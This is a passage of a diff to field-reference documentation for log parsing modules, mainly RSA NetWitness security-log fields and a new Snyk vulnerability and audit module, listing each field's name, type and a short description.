+*`rsa.db.database`*:: + -- +This key is used to capture the name of a database or an instance as seen in a session + type: keyword -- -*`rsa.misc.cn_flowsampid`*:: +*`rsa.db.transact_id`*:: + -- +This key captures the SQL transantion ID of the current session + type: keyword -- -*`rsa.misc.cn_flowsampintv`*:: +*`rsa.db.permissions`*:: + -- +This key captures permission or privilege level assigned to a resource. + type: keyword -- -*`rsa.misc.cn_flowsampmode`*:: +*`rsa.db.table_name`*:: + -- +This key is used to capture the table name + type: keyword -- -*`rsa.misc.cn_inacttimeout`*:: +*`rsa.db.db_id`*:: + -- +This key is used to capture the unique identifier for a database + type: keyword -- -*`rsa.misc.cn_inpermbyts`*:: +*`rsa.db.db_pid`*:: + -- -type: keyword +This key captures the process id of a connection with database server + +type: long -- -*`rsa.misc.cn_inpermpckts`*:: +*`rsa.db.lread`*:: + -- -type: keyword +This key is used for the number of logical reads + +type: long -- -*`rsa.misc.cn_invalid`*:: +*`rsa.db.lwrite`*:: + -- -type: keyword +This key is used for the number of logical writes + +type: long -- -*`rsa.misc.cn_ip_proto_ver`*:: +*`rsa.db.pread`*:: + -- -type: keyword +This key is used for the number of physical writes + +type: long -- -*`rsa.misc.cn_ipv4_ident`*:: + +*`rsa.network.alias_host`*:: + -- +This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. + type: keyword -- -*`rsa.misc.cn_l_switch`*:: +*`rsa.network.domain`*:: + -- type: keyword -- -*`rsa.misc.cn_log_did`*:: +*`rsa.network.host_dst`*:: + -- +This key should only be used when it’s a Destination Hostname + type: keyword -- -*`rsa.misc.cn_log_rid`*:: +*`rsa.network.network_service`*:: + -- +This is used to capture layer 7 protocols/service names + type: keyword -- -*`rsa.misc.cn_max_ttl`*:: +*`rsa.network.interface`*:: + -- +This key should be used when the source or destination context of an interface is not clear + type: keyword -- -*`rsa.misc.cn_maxpcktlen`*:: +*`rsa.network.network_port`*:: + -- -type: keyword +Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) + +type: long -- -*`rsa.misc.cn_min_ttl`*:: +*`rsa.network.eth_host`*:: + -- +Deprecated, use alias.mac + type: keyword -- -*`rsa.misc.cn_minpcktlen`*:: +*`rsa.network.sinterface`*:: + -- +This key should only be used when it’s a Source Interface + type: keyword -- -*`rsa.misc.cn_mpls_lbl_1`*:: +*`rsa.network.dinterface`*:: + -- +This key should only be used when it’s a Destination Interface + type: keyword -- -*`rsa.misc.cn_mpls_lbl_10`*:: +*`rsa.network.vlan`*:: + -- -type: keyword +This key should only be used to capture the ID of the Virtual LAN + +type: long -- -*`rsa.misc.cn_mpls_lbl_2`*:: +*`rsa.network.zone_src`*:: + -- +This key should only be used when it’s a Source Zone. + type: keyword -- -*`rsa.misc.cn_mpls_lbl_3`*:: +*`rsa.network.zone`*:: + -- +This key should be used when the source or destination context of a Zone is not clear + type: keyword -- -*`rsa.misc.cn_mpls_lbl_4`*:: +*`rsa.network.zone_dst`*:: + -- +This key should only be used when it’s a Destination Zone. + type: keyword -- -*`rsa.misc.cn_mpls_lbl_5`*:: +*`rsa.network.gateway`*:: + -- +This key is used to capture the IP Address of the gateway + type: keyword -- -*`rsa.misc.cn_mpls_lbl_6`*:: +*`rsa.network.icmp_type`*:: + -- -type: keyword +This key is used to capture the ICMP type only + +type: long -- -*`rsa.misc.cn_mpls_lbl_7`*:: +*`rsa.network.mask`*:: + -- +This key is used to capture the device network IPmask. + type: keyword -- -*`rsa.misc.cn_mpls_lbl_8`*:: +*`rsa.network.icmp_code`*:: + -- -type: keyword +This key is used to capture the ICMP code only + +type: long -- -*`rsa.misc.cn_mpls_lbl_9`*:: +*`rsa.network.protocol_detail`*:: + -- +This key should be used to capture additional protocol information + type: keyword -- -*`rsa.misc.cn_mplstoplabel`*:: +*`rsa.network.dmask`*:: + -- +This key is used for Destionation Device network mask + type: keyword -- -*`rsa.misc.cn_mplstoplabip`*:: +*`rsa.network.port`*:: + -- -type: keyword +This key should only be used to capture a Network Port when the directionality is not clear + +type: long -- -*`rsa.misc.cn_mul_dst_byt`*:: +*`rsa.network.smask`*:: + -- +This key is used for capturing source Network Mask + type: keyword -- -*`rsa.misc.cn_mul_dst_pks`*:: +*`rsa.network.netname`*:: + -- +This key is used to capture the network name associated with an IP range. This is configured by the end user. + type: keyword -- -*`rsa.misc.cn_muligmptype`*:: +*`rsa.network.paddr`*:: + -- -type: keyword +Deprecated + +type: ip -- -*`rsa.misc.cn_sampalgo`*:: +*`rsa.network.faddr`*:: + -- type: keyword -- -*`rsa.misc.cn_sampint`*:: +*`rsa.network.lhost`*:: + -- type: keyword -- -*`rsa.misc.cn_seqctr`*:: +*`rsa.network.origin`*:: + -- type: keyword -- -*`rsa.misc.cn_spackets`*:: +*`rsa.network.remote_domain_id`*:: + -- type: keyword -- -*`rsa.misc.cn_src_tos`*:: +*`rsa.network.addr`*:: + -- type: keyword -- -*`rsa.misc.cn_src_vlan`*:: +*`rsa.network.dns_a_record`*:: + -- type: keyword -- -*`rsa.misc.cn_sysuptime`*:: +*`rsa.network.dns_ptr_record`*:: + -- type: keyword -- -*`rsa.misc.cn_template_id`*:: +*`rsa.network.fhost`*:: + -- type: keyword -- -*`rsa.misc.cn_totbytsexp`*:: +*`rsa.network.fport`*:: + -- type: keyword -- -*`rsa.misc.cn_totflowexp`*:: +*`rsa.network.laddr`*:: + -- type: keyword -- -*`rsa.misc.cn_totpcktsexp`*:: +*`rsa.network.linterface`*:: + -- type: keyword -- -*`rsa.misc.cn_unixnanosecs`*:: +*`rsa.network.phost`*:: + -- type: keyword -- -*`rsa.misc.cn_v6flowlabel`*:: +*`rsa.network.ad_computer_dst`*:: + -- +Deprecated, use host.dst + type: keyword -- -*`rsa.misc.cn_v6optheaders`*:: +*`rsa.network.eth_type`*:: + -- -type: keyword +This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only + +type: long -- -*`rsa.misc.comp_class`*:: +*`rsa.network.ip_proto`*:: + -- -type: keyword +This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI + +type: long -- -*`rsa.misc.comp_name`*:: +*`rsa.network.dns_cname_record`*:: + -- type: keyword -- -*`rsa.misc.comp_rbytes`*:: +*`rsa.network.dns_id`*:: + -- type: keyword -- -*`rsa.misc.comp_sbytes`*:: +*`rsa.network.dns_opcode`*:: + -- type: keyword -- -*`rsa.misc.cpu_data`*:: +*`rsa.network.dns_resp`*:: + -- type: keyword -- -*`rsa.misc.criticality`*:: +*`rsa.network.dns_type`*:: + -- type: keyword -- -*`rsa.misc.cs_agency_dst`*:: +*`rsa.network.domain1`*:: + -- type: keyword -- -*`rsa.misc.cs_analyzedby`*:: +*`rsa.network.host_type`*:: + -- type: keyword -- -*`rsa.misc.cs_av_other`*:: +*`rsa.network.packet_length`*:: + -- type: keyword -- -*`rsa.misc.cs_av_primary`*:: +*`rsa.network.host_orig`*:: + -- +This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. + type: keyword -- -*`rsa.misc.cs_av_secondary`*:: +*`rsa.network.rpayload`*:: + -- +This key is used to capture the total number of payload bytes seen in the retransmitted packets. + type: keyword -- -*`rsa.misc.cs_bgpv6nxthop`*:: +*`rsa.network.vlan_name`*:: + -- +This key should only be used to capture the name of the Virtual LAN + type: keyword -- -*`rsa.misc.cs_bit9status`*:: + +*`rsa.investigations.ec_activity`*:: + -- +This key captures the particular event activity(Ex:Logoff) + type: keyword -- -*`rsa.misc.cs_context`*:: +*`rsa.investigations.ec_theme`*:: + -- +This key captures the Theme of a particular Event(Ex:Authentication) + type: keyword -- -*`rsa.misc.cs_control`*:: +*`rsa.investigations.ec_subject`*:: + -- +This key captures the Subject of a particular Event(Ex:User) + type: keyword -- -*`rsa.misc.cs_data`*:: +*`rsa.investigations.ec_outcome`*:: + -- +This key captures the outcome of a particular Event(Ex:Success) + type: keyword -- -*`rsa.misc.cs_datecret`*:: +*`rsa.investigations.event_cat`*:: + -- -type: keyword +This key captures the Event category number + +type: long -- -*`rsa.misc.cs_dst_tld`*:: +*`rsa.investigations.event_cat_name`*:: + -- +This key captures the event category name corresponding to the event cat code + type: keyword -- -*`rsa.misc.cs_eth_dst_ven`*:: +*`rsa.investigations.event_vcat`*:: + -- +This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. + type: keyword -- -*`rsa.misc.cs_eth_src_ven`*:: +*`rsa.investigations.analysis_file`*:: + -- +This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file + type: keyword -- -*`rsa.misc.cs_event_uuid`*:: +*`rsa.investigations.analysis_service`*:: + -- +This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service + type: keyword -- -*`rsa.misc.cs_filetype`*:: +*`rsa.investigations.analysis_session`*:: + -- +This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session + type: keyword -- -*`rsa.misc.cs_fld`*:: +*`rsa.investigations.boc`*:: + -- +This is used to capture behaviour of compromise + type: keyword -- -*`rsa.misc.cs_if_desc`*:: +*`rsa.investigations.eoc`*:: + -- +This is used to capture Enablers of Compromise + type: keyword -- -*`rsa.misc.cs_if_name`*:: +*`rsa.investigations.inv_category`*:: + -- +This used to capture investigation category + type: keyword -- -*`rsa.misc.cs_ip_next_hop`*:: +*`rsa.investigations.inv_context`*:: + -- +This used to capture investigation context + type: keyword -- -*`rsa.misc.cs_ipv4dstpre`*:: +*`rsa.investigations.ioc`*:: + -- +This is key capture indicator of compromise + type: keyword -- -*`rsa.misc.cs_ipv4srcpre`*:: + +*`rsa.counters.dclass_c1`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c1.str only + +type: long -- -*`rsa.misc.cs_lifetime`*:: +*`rsa.counters.dclass_c2`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c2.str only + +type: long -- -*`rsa.misc.cs_log_medium`*:: +*`rsa.counters.event_counter`*:: + -- -type: keyword +This is used to capture the number of times an event repeated + +type: long -- -*`rsa.misc.cs_loginname`*:: +*`rsa.counters.dclass_r1`*:: + -- +This is a generic ratio key that should be used with the label dclass.r1.str only + type: keyword -- -*`rsa.misc.cs_modulescore`*:: +*`rsa.counters.dclass_c3`*:: + -- -type: keyword +This is a generic counter key that should be used with the label dclass.c3.str only + +type: long -- -*`rsa.misc.cs_modulesign`*:: +*`rsa.counters.dclass_c1_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c1 only + type: keyword -- -*`rsa.misc.cs_opswatresult`*:: +*`rsa.counters.dclass_c2_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c2 only + type: keyword -- -*`rsa.misc.cs_payload`*:: +*`rsa.counters.dclass_r1_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r1 only + type: keyword -- -*`rsa.misc.cs_registrant`*:: +*`rsa.counters.dclass_r2`*:: + -- +This is a generic ratio key that should be used with the label dclass.r2.str only + type: keyword -- -*`rsa.misc.cs_registrar`*:: +*`rsa.counters.dclass_c3_str`*:: + -- +This is a generic counter string key that should be used with the label dclass.c3 only + type: keyword -- -*`rsa.misc.cs_represult`*:: +*`rsa.counters.dclass_r3`*:: + -- +This is a generic ratio key that should be used with the label dclass.r3.str only + type: keyword -- -*`rsa.misc.cs_rpayload`*:: +*`rsa.counters.dclass_r2_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r2 only + type: keyword -- -*`rsa.misc.cs_sampler_name`*:: +*`rsa.counters.dclass_r3_str`*:: + -- +This is a generic ratio string key that should be used with the label dclass.r3 only + type: keyword -- -*`rsa.misc.cs_sourcemodule`*:: + +*`rsa.identity.auth_method`*:: + -- +This key is used to capture authentication methods used only + type: keyword -- -*`rsa.misc.cs_streams`*:: +*`rsa.identity.user_role`*:: + -- +This key is used to capture the Role of a user only + type: keyword -- -*`rsa.misc.cs_targetmodule`*:: +*`rsa.identity.dn`*:: + -- +X.500 (LDAP) Distinguished Name + type: keyword -- -*`rsa.misc.cs_v6nxthop`*:: +*`rsa.identity.logon_type`*:: + -- +This key is used to capture the type of logon method used. + type: keyword -- -*`rsa.misc.cs_whois_server`*:: +*`rsa.identity.profile`*:: + -- +This key is used to capture the user profile + type: keyword -- -*`rsa.misc.cs_yararesult`*:: +*`rsa.identity.accesses`*:: + -- +This key is used to capture actual privileges used in accessing an object + type: keyword -- -*`rsa.misc.description`*:: +*`rsa.identity.realm`*:: + -- +Radius realm or similar grouping of accounts + type: keyword -- -*`rsa.misc.devvendor`*:: +*`rsa.identity.user_sid_dst`*:: + -- +This key captures Destination User Session ID + type: keyword -- -*`rsa.misc.distance`*:: +*`rsa.identity.dn_src`*:: + -- +An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn + type: keyword -- -*`rsa.misc.dstburb`*:: +*`rsa.identity.org`*:: + -- +This key captures the User organization + type: keyword -- -*`rsa.misc.edomain`*:: +*`rsa.identity.dn_dst`*:: + -- +An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn + type: keyword -- -*`rsa.misc.edomaub`*:: +*`rsa.identity.firstname`*:: + -- +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.euid`*:: +*`rsa.identity.lastname`*:: + -- +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.facility`*:: +*`rsa.identity.user_dept`*:: + -- +User's Department Names only + type: keyword -- -*`rsa.misc.finterface`*:: +*`rsa.identity.user_sid_src`*:: + -- +This key captures Source User Session ID + type: keyword -- -*`rsa.misc.flags`*:: +*`rsa.identity.federated_sp`*:: + -- +This key is the Federated Service Provider. This is the application requesting authentication. + type: keyword -- -*`rsa.misc.gaddr`*:: +*`rsa.identity.federated_idp`*:: + -- +This key is the federated Identity Provider. This is the server providing the authentication. + type: keyword -- -*`rsa.misc.id3`*:: +*`rsa.identity.logon_type_desc`*:: + -- +This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. + type: keyword -- -*`rsa.misc.im_buddyname`*:: +*`rsa.identity.middlename`*:: + -- +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.im_croomid`*:: +*`rsa.identity.password`*:: + -- +This key is for Passwords seen in any session, plain text or encrypted + type: keyword -- -*`rsa.misc.im_croomtype`*:: +*`rsa.identity.host_role`*:: + -- +This key should only be used to capture the role of a Host Machine + type: keyword -- -*`rsa.misc.im_members`*:: +*`rsa.identity.ldap`*:: + -- +This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context + type: keyword -- -*`rsa.misc.im_username`*:: +*`rsa.identity.ldap_query`*:: + -- +This key is the Search criteria from an LDAP search + type: keyword -- -*`rsa.misc.ipkt`*:: +*`rsa.identity.ldap_response`*:: + -- +This key is to capture Results from an LDAP search + type: keyword -- -*`rsa.misc.ipscat`*:: +*`rsa.identity.owner`*:: + -- +This is used to capture username the process or service is running as, the author of the task + type: keyword -- -*`rsa.misc.ipspri`*:: +*`rsa.identity.service_account`*:: + -- +This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage + type: keyword -- -*`rsa.misc.latitude`*:: + +*`rsa.email.email_dst`*:: + -- +This key is used to capture the Destination email address only, when the destination context is not clear use email + type: keyword -- -*`rsa.misc.linenum`*:: +*`rsa.email.email_src`*:: + -- +This key is used to capture the source email address only, when the source context is not clear use email + type: keyword -- -*`rsa.misc.list_name`*:: +*`rsa.email.subject`*:: + -- +This key is used to capture the subject string from an Email only. + type: keyword -- -*`rsa.misc.load_data`*:: +*`rsa.email.email`*:: + -- +This key is used to capture a generic email address where the source or destination context is not clear + type: keyword -- -*`rsa.misc.location_floor`*:: +*`rsa.email.trans_from`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.location_mark`*:: +*`rsa.email.trans_to`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.log_id`*:: + +*`rsa.file.privilege`*:: + -- +Deprecated, use permissions + type: keyword -- -*`rsa.misc.log_type`*:: +*`rsa.file.attachment`*:: + -- +This key captures the attachment file name + type: keyword -- -*`rsa.misc.logid`*:: +*`rsa.file.filesystem`*:: + -- type: keyword -- -*`rsa.misc.logip`*:: +*`rsa.file.binary`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.logname`*:: +*`rsa.file.filename_dst`*:: + -- +This is used to capture name of the file targeted by the action + type: keyword -- -*`rsa.misc.longitude`*:: +*`rsa.file.filename_src`*:: + -- +This is used to capture name of the parent filename, the file which performed the action + type: keyword -- -*`rsa.misc.lport`*:: +*`rsa.file.filename_tmp`*:: + -- type: keyword -- -*`rsa.misc.mbug_data`*:: +*`rsa.file.directory_dst`*:: + -- +This key is used to capture the directory of the target process or file + type: keyword -- -*`rsa.misc.misc_name`*:: +*`rsa.file.directory_src`*:: + -- +This key is used to capture the directory of the source process or file + type: keyword -- -*`rsa.misc.msg_type`*:: +*`rsa.file.file_entropy`*:: + -- -type: keyword +This is used to capture entropy vale of a file + +type: double -- -*`rsa.misc.msgid`*:: +*`rsa.file.file_vendor`*:: + -- +This is used to capture Company name of file located in version_info + type: keyword -- -*`rsa.misc.netsessid`*:: +*`rsa.file.task_name`*:: + -- +This is used to capture name of the task + type: keyword -- -*`rsa.misc.num`*:: + +*`rsa.web.fqdn`*:: + -- +Fully Qualified Domain Names + type: keyword -- -*`rsa.misc.number1`*:: +*`rsa.web.web_cookie`*:: + -- +This key is used to capture the Web cookies specifically. + type: keyword -- -*`rsa.misc.number2`*:: +*`rsa.web.alias_host`*:: + -- type: keyword -- -*`rsa.misc.nwwn`*:: +*`rsa.web.reputation_num`*:: + -- -type: keyword +Reputation Number of an entity. Typically used for Web Domains + +type: double -- -*`rsa.misc.object`*:: +*`rsa.web.web_ref_domain`*:: + -- +Web referer's domain + type: keyword -- -*`rsa.misc.operation`*:: +*`rsa.web.web_ref_query`*:: + -- +This key captures Web referer's query portion of the URL + type: keyword -- -*`rsa.misc.opkt`*:: +*`rsa.web.remote_domain`*:: + -- type: keyword -- -*`rsa.misc.orig_from`*:: +*`rsa.web.web_ref_page`*:: + -- +This key captures Web referer's page information + type: keyword -- -*`rsa.misc.owner_id`*:: +*`rsa.web.web_ref_root`*:: + -- +Web referer's root URL path + type: keyword -- -*`rsa.misc.p_action`*:: +*`rsa.web.cn_asn_dst`*:: + -- type: keyword -- -*`rsa.misc.p_filter`*:: +*`rsa.web.cn_rpackets`*:: + -- type: keyword -- -*`rsa.misc.p_group_object`*:: +*`rsa.web.urlpage`*:: + -- type: keyword -- -*`rsa.misc.p_id`*:: +*`rsa.web.urlroot`*:: + -- type: keyword -- -*`rsa.misc.p_msgid1`*:: +*`rsa.web.p_url`*:: + -- type: keyword -- -*`rsa.misc.p_msgid2`*:: +*`rsa.web.p_user_agent`*:: + -- type: keyword -- -*`rsa.misc.p_result1`*:: +*`rsa.web.p_web_cookie`*:: + -- type: keyword -- -*`rsa.misc.password_chg`*:: +*`rsa.web.p_web_method`*:: + -- type: keyword -- -*`rsa.misc.password_expire`*:: +*`rsa.web.p_web_referer`*:: + -- type: keyword -- -*`rsa.misc.permgranted`*:: +*`rsa.web.web_extension_tmp`*:: + -- type: keyword -- -*`rsa.misc.permwanted`*:: +*`rsa.web.web_page`*:: + -- type: keyword -- -*`rsa.misc.pgid`*:: + +*`rsa.threat.threat_category`*:: + -- +This key captures Threat Name/Threat Category/Categorization of alert + type: keyword -- -*`rsa.misc.policyUUID`*:: +*`rsa.threat.threat_desc`*:: + -- +This key is used to capture the threat description from the session directly or inferred + type: keyword -- -*`rsa.misc.prog_asp_num`*:: +*`rsa.threat.alert`*:: + -- +This key is used to capture name of the alert + type: keyword -- -*`rsa.misc.program`*:: +*`rsa.threat.threat_source`*:: + -- +This key is used to capture source of the threat + type: keyword -- -*`rsa.misc.real_data`*:: + +*`rsa.crypto.crypto`*:: + -- +This key is used to capture the Encryption Type or Encryption Key only + type: keyword -- -*`rsa.misc.rec_asp_device`*:: +*`rsa.crypto.cipher_src`*:: + -- +This key is for Source (Client) Cipher + type: keyword -- -*`rsa.misc.rec_asp_num`*:: +*`rsa.crypto.cert_subject`*:: + -- +This key is used to capture the Certificate organization only + type: keyword -- -*`rsa.misc.rec_library`*:: +*`rsa.crypto.peer`*:: + -- +This key is for Encryption peer's IP Address + type: keyword -- -*`rsa.misc.recordnum`*:: +*`rsa.crypto.cipher_size_src`*:: + -- -type: keyword +This key captures Source (Client) Cipher Size + +type: long -- -*`rsa.misc.ruid`*:: +*`rsa.crypto.ike`*:: + -- +IKE negotiation phase. + type: keyword -- -*`rsa.misc.sburb`*:: +*`rsa.crypto.scheme`*:: + -- +This key captures the Encryption scheme used + type: keyword -- -*`rsa.misc.sdomain_fld`*:: +*`rsa.crypto.peer_id`*:: + -- +This key is for Encryption peer’s identity + type: keyword -- -*`rsa.misc.sec`*:: +*`rsa.crypto.sig_type`*:: + -- +This key captures the Signature Type + type: keyword -- -*`rsa.misc.sensorname`*:: +*`rsa.crypto.cert_issuer`*:: + -- type: keyword -- -*`rsa.misc.seqnum`*:: +*`rsa.crypto.cert_host_name`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.session`*:: +*`rsa.crypto.cert_error`*:: + -- +This key captures the Certificate Error String + type: keyword -- -*`rsa.misc.sessiontype`*:: +*`rsa.crypto.cipher_dst`*:: + -- +This key is for Destination (Server) Cipher + type: keyword -- -*`rsa.misc.sigUUID`*:: +*`rsa.crypto.cipher_size_dst`*:: + -- -type: keyword +This key captures Destination (Server) Cipher Size + +type: long -- -*`rsa.misc.spi`*:: +*`rsa.crypto.ssl_ver_src`*:: + -- +Deprecated, use version + type: keyword -- -*`rsa.misc.srcburb`*:: +*`rsa.crypto.d_certauth`*:: + -- type: keyword -- -*`rsa.misc.srcdom`*:: +*`rsa.crypto.s_certauth`*:: + -- type: keyword -- -*`rsa.misc.srcservice`*:: +*`rsa.crypto.ike_cookie1`*:: + -- +ID of the negotiation — sent for ISAKMP Phase One + type: keyword -- -*`rsa.misc.state`*:: +*`rsa.crypto.ike_cookie2`*:: + -- +ID of the negotiation — sent for ISAKMP Phase Two + type: keyword -- -*`rsa.misc.status1`*:: +*`rsa.crypto.cert_checksum`*:: + -- type: keyword -- -*`rsa.misc.svcno`*:: +*`rsa.crypto.cert_host_cat`*:: + -- +This key is used for the hostname category value of a certificate + type: keyword -- -*`rsa.misc.system`*:: +*`rsa.crypto.cert_serial`*:: + -- +This key is used to capture the Certificate serial number only + type: keyword -- -*`rsa.misc.tbdstr1`*:: +*`rsa.crypto.cert_status`*:: + -- +This key captures Certificate validation status + type: keyword -- -*`rsa.misc.tgtdom`*:: +*`rsa.crypto.ssl_ver_dst`*:: + -- +Deprecated, use version + type: keyword -- -*`rsa.misc.tgtdomain`*:: +*`rsa.crypto.cert_keysize`*:: + -- type: keyword -- -*`rsa.misc.threshold`*:: +*`rsa.crypto.cert_username`*:: + -- type: keyword -- -*`rsa.misc.type1`*:: +*`rsa.crypto.https_insact`*:: + -- type: keyword -- -*`rsa.misc.udb_class`*:: +*`rsa.crypto.https_valid`*:: + -- type: keyword -- -*`rsa.misc.url_fld`*:: +*`rsa.crypto.cert_ca`*:: + -- +This key is used to capture the Certificate signing authority only + type: keyword -- -*`rsa.misc.user_div`*:: +*`rsa.crypto.cert_common`*:: + -- +This key is used to capture the Certificate common name only + type: keyword -- -*`rsa.misc.userid`*:: + +*`rsa.wireless.wlan_ssid`*:: + -- +This key is used to capture the ssid of a Wireless Session + type: keyword -- -*`rsa.misc.username_fld`*:: +*`rsa.wireless.access_point`*:: + -- +This key is used to capture the access point name. + type: keyword -- -*`rsa.misc.utcstamp`*:: +*`rsa.wireless.wlan_channel`*:: + -- -type: keyword +This is used to capture the channel names + +type: long -- -*`rsa.misc.v_instafname`*:: +*`rsa.wireless.wlan_name`*:: + -- +This key captures either WLAN number/name + type: keyword -- -*`rsa.misc.virt_data`*:: + +*`rsa.storage.disk_volume`*:: + -- +A unique name assigned to logical units (volumes) within a physical disk + type: keyword -- -*`rsa.misc.vpnid`*:: +*`rsa.storage.lun`*:: + -- +Logical Unit Number.This key is a very useful concept in Storage. + type: keyword -- -*`rsa.misc.autorun_type`*:: +*`rsa.storage.pwwn`*:: + -- -This is used to capture Auto Run type +This uniquely identifies a port on a HBA. type: keyword -- -*`rsa.misc.cc_number`*:: + +*`rsa.physical.org_dst`*:: + -- -Valid Credit Card Numbers only +This is used to capture the destination organization based on the GEOPIP Maxmind database. -type: long +type: keyword -- -*`rsa.misc.content`*:: +*`rsa.physical.org_src`*:: + -- -This key captures the content type from protocol headers +This is used to capture the source organization based on the GEOPIP Maxmind database. type: keyword -- -*`rsa.misc.ein_number`*:: + +*`rsa.healthcare.patient_fname`*:: + -- -Employee Identification Numbers only +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information -type: long +type: keyword -- -*`rsa.misc.found`*:: +*`rsa.healthcare.patient_id`*:: + -- -This is used to capture the results of regex match +This key captures the unique ID for a patient type: keyword -- -*`rsa.misc.language`*:: +*`rsa.healthcare.patient_lname`*:: + -- -This is used to capture list of languages the client support and what it prefers +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information type: keyword -- -*`rsa.misc.lifetime`*:: +*`rsa.healthcare.patient_mname`*:: + -- -This key is used to capture the session lifetime in seconds. +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information -type: long +type: keyword -- -*`rsa.misc.link`*:: + +*`rsa.endpoint.host_state`*:: + -- -This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on type: keyword -- -*`rsa.misc.match`*:: +*`rsa.endpoint.registry_key`*:: + -- -This key is for regex match name from search.ini +This key captures the path to the registry key type: keyword -- -*`rsa.misc.param_dst`*:: +*`rsa.endpoint.registry_value`*:: + -- -This key captures the command line/launch argument of the target process or file +This key captures values or decorators used within a registry entry type: keyword -- -*`rsa.misc.param_src`*:: +[[exported-fields-snyk]] +== Snyk fields + +Snyk module + + + +[float] +=== snyk + +Module for parsing Snyk project vulnerabilities. + + + +*`snyk.projects`*:: + -- -This key captures source parameter +Array with all related projects objects. -type: keyword + +type: flattened -- -*`rsa.misc.search_text`*:: +*`snyk.related.projects`*:: + -- -This key captures the Search Text used +Array of all the related project ID's. + type: keyword -- -*`rsa.misc.sig_name`*:: +[float] +=== audit + +Module for parsing Snyk audit logs. + + + +*`snyk.audit.org_id`*:: + -- -This key is used to capture the Signature Name only. +ID of the related Organization related to the event. + type: keyword -- -*`rsa.misc.snmp_value`*:: +*`snyk.audit.project_id`*:: + -- -SNMP set request value +ID of the project related to the event. + type: keyword -- -*`rsa.misc.streams`*:: +*`snyk.audit.content`*:: + -- -This key captures number of streams in session +Overview of the content that was changed, both old and new values. -type: long + +type: flattened -- +[float] +=== vulnerabilities -*`rsa.db.index`*:: +Module for parsing Snyk project vulnerabilities. + + + +*`snyk.vulnerabilities.cvss3`*:: + -- -This key captures IndexID of the index. +CSSv3 scores. + type: keyword -- -*`rsa.db.instance`*:: +*`snyk.vulnerabilities.disclosure_time`*:: + -- -This key is used to capture the database server instance name +The time this vulnerability was originally disclosed to the package maintainers. -type: keyword + +type: date -- -*`rsa.db.database`*:: +*`snyk.vulnerabilities.exploit_maturity`*:: + -- -This key is used to capture the name of a database or an instance as seen in a session +The Snyk exploit maturity level. + type: keyword -- -*`rsa.db.transact_id`*:: +*`snyk.vulnerabilities.id`*:: + -- -This key captures the SQL transantion ID of the current session +The vulnerability reference ID. + type: keyword -- -*`rsa.db.permissions`*:: +*`snyk.vulnerabilities.is_ignored`*:: + -- -This key captures permission or privilege level assigned to a resource. +If the vulnerability report has been ignored. -type: keyword + +type: boolean -- -*`rsa.db.table_name`*:: +*`snyk.vulnerabilities.is_patchable`*:: + -- -This key is used to capture the table name +If vulnerability is fixable by using a Snyk supplied patch. -type: keyword + +type: boolean -- -*`rsa.db.db_id`*:: +*`snyk.vulnerabilities.is_patched`*:: + -- -This key is used to capture the unique identifier for a database +If the vulnerability has been patched. -type: keyword + +type: boolean -- -*`rsa.db.db_pid`*:: +*`snyk.vulnerabilities.is_pinnable`*:: + -- -This key captures the process id of a connection with database server +If the vulnerability is fixable by pinning a transitive dependency. -type: long + +type: boolean -- -*`rsa.db.lread`*:: +*`snyk.vulnerabilities.is_upgradable`*:: + -- -This key is used for the number of logical reads +If the vulnerability fixable by upgrading a dependency. -type: long + +type: boolean -- -*`rsa.db.lwrite`*:: +*`snyk.vulnerabilities.language`*:: + -- -This key is used for the number of logical writes +The package's programming language. -type: long + +type: keyword -- -*`rsa.db.pread`*:: +*`snyk.vulnerabilities.package`*:: + -- -This key is used for the number of physical writes +The package identifier according to its package manager. -type: long --- +type: keyword +-- -*`rsa.network.alias_host`*:: +*`snyk.vulnerabilities.package_manager`*:: + -- -This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. +The package manager. + type: keyword -- -*`rsa.network.domain`*:: +*`snyk.vulnerabilities.patches`*:: + -- -type: keyword +Patches required to resolve the issue created by Snyk. + + +type: flattened -- -*`rsa.network.host_dst`*:: +*`snyk.vulnerabilities.priority_score`*:: + -- -This key should only be used when it’s a Destination Hostname +The CVS priority score. -type: keyword + +type: long -- -*`rsa.network.network_service`*:: +*`snyk.vulnerabilities.publication_time`*:: + -- -This is used to capture layer 7 protocols/service names +The vulnerability publication time. -type: keyword + +type: date -- -*`rsa.network.interface`*:: +*`snyk.vulnerabilities.jira_issue_url`*:: + -- -This key should be used when the source or destination context of an interface is not clear +Link to the 